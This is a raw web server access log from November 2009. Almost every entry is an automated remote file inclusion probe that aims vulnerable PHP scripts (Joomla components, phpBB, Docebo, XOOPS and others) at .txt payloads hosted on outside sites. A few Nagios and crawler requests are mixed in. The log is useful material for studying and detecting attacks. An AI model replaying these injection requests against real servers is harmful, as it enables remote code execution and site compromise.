83.103.72.130 - - [01/Nov/2009:01:37:14 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
58.230.123.88 - - [01/Nov/2009:01:37:37 -0400] "GET /logs/access_log.Q109100300//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:37:49 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:37:49 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:37:49 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:37:49 -0400] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:38:00 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:38:00 -0400] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:38:00 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:38:01 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
174.143.3.188 - - [01/Nov/2009:01:38:16 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
174.143.3.188 - - [01/Nov/2009:01:38:16 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
174.143.3.188 - - [01/Nov/2009:01:38:16 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [01/Nov/2009:01:38:16 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.89.214.167 - - [01/Nov/2009:01:38:28 -0400] "GET //include/write.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:38:28 -0400] "GET /logs//include/write.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:38:28 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:39:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.116.203 - - [01/Nov/2009:01:40:06 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:40:06 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:40:07 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:40:07 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:40:07 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:40:07 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:40:12 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:40:12 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:40:26 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:40:41 -0400] "GET /logs/access_log.Q109081400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:01:42:46 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:42:59 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:42:59 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:42:59 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:43:10 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:24 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:24 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:24 -0400] "GET /logs/access_log.Q109071100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:25 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:25 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:25 -0400] "GET /logs/access_log.Q109071100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:44:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.73.17.7 - - [01/Nov/2009:01:44:28 -0400] "GET /logs/access_log.Q109092600/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:31 -0400] "GET /logs/access_log.Q109092600/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:39 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:39 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:39 -0400] "GET /logs/access_log.Q109071100%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:40 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:40 -0400] "GET /logs/access_log.Q109071100%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:40 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:44 -0400] "GET /logs/access_log.Q109092600%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:44:46 -0400] "GET /logs/access_log.Q109092600%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:45:25 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:45:25 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:45:25 -0400] "GET /logs/access_log.Q109071100%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:45:52 -0400] "GET /logs/access_log.Q109092600%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:32 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:32 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:32 -0400] "GET /logs/access_log.Q109080700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:33 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:33 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:33 -0400] "GET /logs/access_log.Q109080700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:34 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:34 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:34 -0400] "GET /logs/access_log.Q109080700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:39 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:39 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:46:39 -0400] "GET /logs/access_log.Q109080700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:01:46:50 -0400] "GET /logs/access_log.Q108061100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.46.179 - - [01/Nov/2009:01:47:34 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:47:34 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:47:34 -0400] "GET /logs/access_log.Q109071100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:47:38 -0400] "GET /logs/access_log.Q109092600/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:48:03 -0400] "GET /logs/access_log.Q109071300////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:48:03 -0400] "GET /logs/access_log.Q109051800////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:48:03 -0400] "GET /logs////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:48:37 -0400] "GET /logs//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:48:37 -0400] "GET //skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:48:37 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.143.29.189 - - [01/Nov/2009:01:48:40 -0400] "GET /logs/access_log.Q109102000//dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
221.143.29.189 - - [01/Nov/2009:01:48:41 -0400] "GET //dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
221.143.29.189 - - [01/Nov/2009:01:48:41 -0400] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
77.221.130.24 - - [01/Nov/2009:01:49:01 -0400] "GET //skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:49:01 -0400] "GET /logs//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:49:01 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:49:03 -0400] "GET /logs/access_log.Q109071300%20%20////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:49:03 -0400] "GET /logs/access_log.Q109051800%20%20////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.127.87.143 - - [01/Nov/2009:01:49:07 -0400] "GET /index.php?site=http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
219.127.87.143 - - [01/Nov/2009:01:49:08 -0400] "GET /logs/index.php?site=http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.59.12.99 - - [01/Nov/2009:01:49:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.4.8.14 - - [01/Nov/2009:01:49:28 -0400] "GET /logs/access_log.Q109071300////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:49:28 -0400] "GET /logs/access_log.Q109051800////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:49:28 -0400] "GET /logs////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
219.127.87.143 - - [01/Nov/2009:01:49:33 -0400] "GET /logs//phpBB2/admin/admin_cash.phpphpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
219.127.87.143 - - [01/Nov/2009:01:49:33 -0400] "GET //phpBB2/admin/admin_cash.phpphpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
77.221.130.24 - - [01/Nov/2009:01:50:01 -0400] "GET /logs/access_log.Q109093000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:50:10 -0400] "GET //skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:50:10 -0400] "GET /logs//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:50:10 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:50:14 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:50:25 -0400] "GET /logs/access_log.Q109093000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:50:37 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:51:26 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:51:44 -0400] "GET /logs/access_log.Q109093000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:51:54 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:51:54 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:51:54 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:51:56 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.221.130.24 - - [01/Nov/2009:01:51:57 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:52:31 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:52:31 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:52:50 -0400] "GET /logs/access_log.Q109070300/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:53:12 -0400] "GET /logs/access_log.Q109070300/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:54:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.247.60.5 - - [01/Nov/2009:01:55:42 -0400] "GET /logs/access_log.Q109061400%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:55:42 -0400] "GET /logs/access_log.Q109070300%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:55:57 -0400] "GET /logs/access_log.Q109061400%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
221.143.29.189 - - [01/Nov/2009:01:56:22 -0400] "GET /logs/error_log.Q109101400//dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
125.247.60.5 - - [01/Nov/2009:01:56:48 -0400] "GET /logs/access_log.Q109070300%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
219.127.87.143 - - [01/Nov/2009:01:56:51 -0400] "GET /contact.php?phpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
